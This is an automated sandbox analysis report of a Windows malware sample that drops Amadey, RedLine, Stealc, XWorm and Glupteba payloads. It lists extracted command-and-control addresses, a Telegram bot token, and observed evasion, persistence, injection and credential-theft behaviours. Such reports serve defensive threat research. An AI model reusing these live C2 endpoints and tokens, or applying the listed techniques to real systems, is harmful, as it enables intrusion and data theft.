Analysis
-
max time kernel
100s -
max time network
156s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system -
submitted
28-04-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral2
Sample
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe
Resource
win11-20240426-en
General
-
Target
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe
-
Size
1.8MB
-
MD5
25d59b166400d30f6da06e06475bade9
-
SHA1
e97e8af73c35544c5f4617fd707bfcbadb35ff7e
-
SHA256
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b
-
SHA512
c09ded60888f68798999638e16f940791550ce7218f5e1b1b7e86ac4b6d1e4746c46a19556f6ce8aa933ec54744f687c0cdff7c8db7a1166923048424ee265b7
-
SSDEEP
24576:k5bZoqIKHH7rxtoblP4FUfox73SueU1CJyXswAkOnNAj6r10ydR6CXaRec+EPcyC:PE7rxaRroxlPcwaXnGyLL6te8v1bo5/
Malware Config
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
http://185.172.128.150
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral2/memory/1736-283-0x00000000007F0000-0x0000000000802000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4544-75-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral2/memory/3084-101-0x0000000000450000-0x0000000000510000-memory.dmp family_zgrat_v1 -
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/3324-702-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/3480-701-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/4944-831-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/680-830-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1604-881-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1604-1030-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1604-1071-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
vqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline behavioral2/memory/3236-97-0x0000000000850000-0x00000000008A2000-memory.dmp family_redline behavioral2/memory/3084-101-0x0000000000450000-0x0000000000510000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral2/memory/1984-179-0x0000000000040000-0x0000000000092000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exevqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Blocklisted process makes network request 5 IoCs
Processes:
rundll32.exePIGAHxGe2PbxS5e6f1KRsKtL.exerundll32.exeflow pid process 33 1240 rundll32.exe 50 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 51 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 52 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 58 3044 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3936 netsh.exe 2244 netsh.exe -
Checks BIOS information in registry 2 TTPs 7 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exed540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exevqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vqWRXwiYTAOQ7LQpPAXyXrKb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Executes dropped EXE 31 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exetrf.exekeks.exegold.exeNewB.exejok.exeswiiii.exefile300un.exemstc.exePIGAHxGe2PbxS5e6f1KRsKtL.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exeu2og.0.exerun.exeu2og.3.exevqWRXwiYTAOQ7LQpPAXyXrKb.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.execsrss.exeinjector.exeNNCOsc0vdMxEbZzlFP8211Wx.exeInstall.exewindefender.exe36y0Ywm7mT9F0RMTmnGvTs2k.exewindefender.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exepid process 2068 chrosha.exe 1856 swiiiii.exe 1568 alexxxxxxxx.exe 3084 trf.exe 3236 keks.exe 1832 gold.exe 2096 NewB.exe 1984 jok.exe 3408 swiiii.exe 4560 file300un.exe 1736 mstc.exe 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe 3324 4odFPgou1NdrXX1AEvintttJ.exe 1436 u2og.0.exe 1240 run.exe 1572 u2og.3.exe 3896 vqWRXwiYTAOQ7LQpPAXyXrKb.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 4944 4odFPgou1NdrXX1AEvintttJ.exe 1604 csrss.exe 3820 injector.exe 3472 NNCOsc0vdMxEbZzlFP8211Wx.exe 244 Install.exe 2736 windefender.exe 4648 36y0Ywm7mT9F0RMTmnGvTs2k.exe 1672 windefender.exe 4664 36y0Ywm7mT9F0RMTmnGvTs2k.exe 3444 36y0Ywm7mT9F0RMTmnGvTs2k.exe 228 36y0Ywm7mT9F0RMTmnGvTs2k.exe 4772 36y0Ywm7mT9F0RMTmnGvTs2k.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine chrosha.exe -
Loads dropped DLL 9 IoCs
Processes:
rundll32.exerundll32.exerun.exerundll32.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exepid process 4740 rundll32.exe 1240 rundll32.exe 1240 run.exe 3044 rundll32.exe 4648 36y0Ywm7mT9F0RMTmnGvTs2k.exe 4664 36y0Ywm7mT9F0RMTmnGvTs2k.exe 3444 36y0Ywm7mT9F0RMTmnGvTs2k.exe 228 36y0Ywm7mT9F0RMTmnGvTs2k.exe 4772 36y0Ywm7mT9F0RMTmnGvTs2k.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe themida behavioral2/memory/3896-618-0x0000000140000000-0x0000000140749000-memory.dmp themida behavioral2/memory/3896-829-0x0000000140000000-0x0000000140749000-memory.dmp themida -
Processes:
resource yara_rule behavioral2/memory/1672-1046-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
mstc.exe4odFPgou1NdrXX1AEvintttJ.exec60PHerJOpPIJ0qXm2jrdNh4.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" c60PHerJOpPIJ0qXm2jrdNh4.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
vqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exedescription ioc process File opened (read-only) \??\D: 36y0Ywm7mT9F0RMTmnGvTs2k.exe File opened (read-only) \??\F: 36y0Ywm7mT9F0RMTmnGvTs2k.exe File opened (read-only) \??\D: 36y0Ywm7mT9F0RMTmnGvTs2k.exe File opened (read-only) \??\F: 36y0Ywm7mT9F0RMTmnGvTs2k.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ipinfo.io 9 ip-api.com 9 api.myip.com 56 api.myip.com 61 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 14 IoCs
Processes:
vqWRXwiYTAOQ7LQpPAXyXrKb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy vqWRXwiYTAOQ7LQpPAXyXrKb.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol vqWRXwiYTAOQ7LQpPAXyXrKb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI vqWRXwiYTAOQ7LQpPAXyXrKb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini vqWRXwiYTAOQ7LQpPAXyXrKb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exevqWRXwiYTAOQ7LQpPAXyXrKb.exepid process 3312 d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe 2068 chrosha.exe 3896 vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.execmd.exedescription pid process target process PID 1856 set thread context of 1716 1856 swiiiii.exe RegAsm.exe PID 1568 set thread context of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1832 set thread context of 2632 1832 gold.exe RegAsm.exe PID 3408 set thread context of 3768 3408 swiiii.exe RegAsm.exe PID 4560 set thread context of 4704 4560 file300un.exe installutil.exe PID 1240 set thread context of 396 1240 run.exe cmd.exe PID 396 set thread context of 4024 396 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
c60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN c60PHerJOpPIJ0qXm2jrdNh4.exe File opened (read-only) \??\VBoxMiniRdrDN 4odFPgou1NdrXX1AEvintttJ.exe -
Drops file in Windows directory 7 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe4odFPgou1NdrXX1AEvintttJ.exec60PHerJOpPIJ0qXm2jrdNh4.execsrss.exedescription ioc process File created C:\Windows\Tasks\chrosha.job d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe File opened for modification C:\Windows\rss 4odFPgou1NdrXX1AEvintttJ.exe File created C:\Windows\rss\csrss.exe 4odFPgou1NdrXX1AEvintttJ.exe File opened for modification C:\Windows\rss c60PHerJOpPIJ0qXm2jrdNh4.exe File created C:\Windows\rss\csrss.exe c60PHerJOpPIJ0qXm2jrdNh4.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exepid process 1352 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3872 1856 WerFault.exe swiiiii.exe 4024 1568 WerFault.exe alexxxxxxxx.exe 4324 1832 WerFault.exe gold.exe 4080 3472 WerFault.exe PIGAHxGe2PbxS5e6f1KRsKtL.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u2og.3.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2og.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2og.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2og.3.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5832 schtasks.exe 2876 schtasks.exe 4456 schtasks.exe 4664 schtasks.exe 72 schtasks.exe 3100 schtasks.exe 5660 schtasks.exe 5920 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
Processes:
keks.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 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 keks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 1736 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exetrf.exekeks.exerundll32.exepowershell.exepowershell.exejok.exepowershell.exepowershell.exepowershell.exepowershell.exerun.exepowershell.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exepowershell.exepowershell.exemstc.exec60PHerJOpPIJ0qXm2jrdNh4.exepid process 3312 d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe 3312 d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe 2068 chrosha.exe 2068 chrosha.exe 3084 trf.exe 3236 keks.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 3236 keks.exe 3236 keks.exe 3236 keks.exe 3236 keks.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 4392 powershell.exe 4392 powershell.exe 4392 powershell.exe 3620 powershell.exe 3620 powershell.exe 3620 powershell.exe 1984 jok.exe 1984 jok.exe 1984 jok.exe 1984 jok.exe 2632 powershell.exe 2632 powershell.exe 2632 powershell.exe 3100 powershell.exe 3100 powershell.exe 576 powershell.exe 576 powershell.exe 3276 powershell.exe 3276 powershell.exe 576 powershell.exe 3100 powershell.exe 3276 powershell.exe 1240 run.exe 1240 run.exe 1240 run.exe 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe 3324 4odFPgou1NdrXX1AEvintttJ.exe 3324 4odFPgou1NdrXX1AEvintttJ.exe 2944 powershell.exe 2944 powershell.exe 2604 powershell.exe 2604 powershell.exe 2944 powershell.exe 2604 powershell.exe 1736 mstc.exe 1736 mstc.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 1240 run.exe 396 cmd.exe 396 cmd.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
trf.exekeks.exemstc.exeinstallutil.exepowershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exepowershell.exesc.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 3084 trf.exe Token: SeBackupPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeDebugPrivilege 3236 keks.exe Token: SeDebugPrivilege 1736 mstc.exe Token: SeDebugPrivilege 4704 installutil.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeDebugPrivilege 4544 RegAsm.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe Token: SeImpersonatePrivilege 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe Token: SeDebugPrivilege 3324 4odFPgou1NdrXX1AEvintttJ.exe Token: SeImpersonatePrivilege 3324 4odFPgou1NdrXX1AEvintttJ.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 1736 mstc.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 3820 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeSystemEnvironmentPrivilege 1604 csrss.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeSecurityPrivilege 1352 sc.exe Token: SeSecurityPrivilege 1352 sc.exe Token: SeDebugPrivilege 3532 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 4024 MSBuild.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
u2og.3.exepid process 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u2og.3.exepid process 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exemstc.exepid process 1240 run.exe 1240 run.exe 1736 mstc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes: chrosha.exe swiiiii.exe alexxxxxxxx.exe RegAsm.exe gold.exe
description | pid | process | target process
PID 2068 wrote to memory of 1856 | 2068 | chrosha.exe | swiiiii.exe
PID 2068 wrote to memory of 1856 | 2068 | chrosha.exe | swiiiii.exe
PID 2068 wrote to memory of 1856 | 2068 | chrosha.exe | swiiiii.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 1856 wrote to memory of 1716 | 1856 | swiiiii.exe | RegAsm.exe
PID 2068 wrote to memory of 1568 | 2068 | chrosha.exe | alexxxxxxxx.exe
PID 2068 wrote to memory of 1568 | 2068 | chrosha.exe | alexxxxxxxx.exe
PID 2068 wrote to memory of 1568 | 2068 | chrosha.exe | alexxxxxxxx.exe
PID 1568 wrote to memory of 3252 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 3252 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 3252 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 2028 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 2028 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 2028 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4532 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4532 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4532 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4012 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4012 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4012 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 2816 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 2816 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 2816 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 5084 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 5084 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 5084 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 1568 wrote to memory of 4544 | 1568 | alexxxxxxxx.exe | RegAsm.exe
PID 4544 wrote to memory of 3084 | 4544 | RegAsm.exe | trf.exe
PID 4544 wrote to memory of 3084 | 4544 | RegAsm.exe | trf.exe
PID 4544 wrote to memory of 3236 | 4544 | RegAsm.exe | keks.exe
PID 4544 wrote to memory of 3236 | 4544 | RegAsm.exe | keks.exe
PID 4544 wrote to memory of 3236 | 4544 | RegAsm.exe | keks.exe
PID 2068 wrote to memory of 1832 | 2068 | chrosha.exe | gold.exe
PID 2068 wrote to memory of 1832 | 2068 | chrosha.exe | gold.exe
PID 2068 wrote to memory of 1832 | 2068 | chrosha.exe | gold.exe
PID 1832 wrote to memory of 944 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 944 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 944 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
PID 1832 wrote to memory of 2632 | 1832 | gold.exe | RegAsm.exe
